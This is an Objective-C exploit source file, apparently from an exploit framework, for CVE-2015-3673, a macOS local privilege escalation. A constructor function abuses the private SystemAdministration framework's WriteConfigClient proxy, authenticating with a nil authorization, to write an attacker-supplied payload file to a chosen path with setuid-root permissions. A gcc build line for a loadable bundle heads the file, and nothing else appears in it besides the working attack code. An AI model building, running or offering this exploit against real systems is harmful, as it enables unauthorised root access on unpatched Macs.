data/exploits/CVE-2015-3673/exploit.m
// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
#include <dlfcn.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <objc/message.h>
#include <Foundation/Foundation.h>
#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
#define FWK_BASE "/System/Library/Frameworks"
void __attribute__ ((constructor)) test(void)
{
void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
if (p != NULL)
{
id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
NSData* data = [NSData dataWithContentsOfFile:inpath];
objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
data,
outpath,
@{ NSFilePosixPermissions : @04777 });
}
exit(1);
}